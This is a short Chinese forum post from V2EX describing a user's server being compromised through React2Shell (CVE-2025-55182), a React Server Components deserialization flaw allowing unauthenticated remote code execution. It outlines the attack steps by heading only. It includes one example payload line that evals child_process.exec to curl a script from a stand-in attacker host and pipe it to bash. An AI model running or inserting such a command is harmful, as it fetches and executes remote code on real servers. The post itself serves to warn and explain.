中招了 React2Shell 一个影响 React 的严重未经身份验证的远程代码执行漏洞

2025 年 12 月 9 日
 dodoa

React2Shell (CVE-2025-55182)

前段时间用 CC 写了一个应用的 Web 管理后台并部署在阿里云,结果周末就遭遇了攻击。


漏洞原理

React Server Components 的反序列化漏洞:


攻击步骤(概述)

1. 发现目标

2. 构造恶意 payload

// 恶意 RSC payload 中可能包含的示例
eval('require("child_process").exec("curl http://attacker.com/python.sh | bash")')

3. 发送攻击请求

4. 服务器执行

5. 后门建立

2230 次点击
所在节点    信息安全
1 条回复
songsongqaq
2025 年 12 月 9 日

已中招

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1177717

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX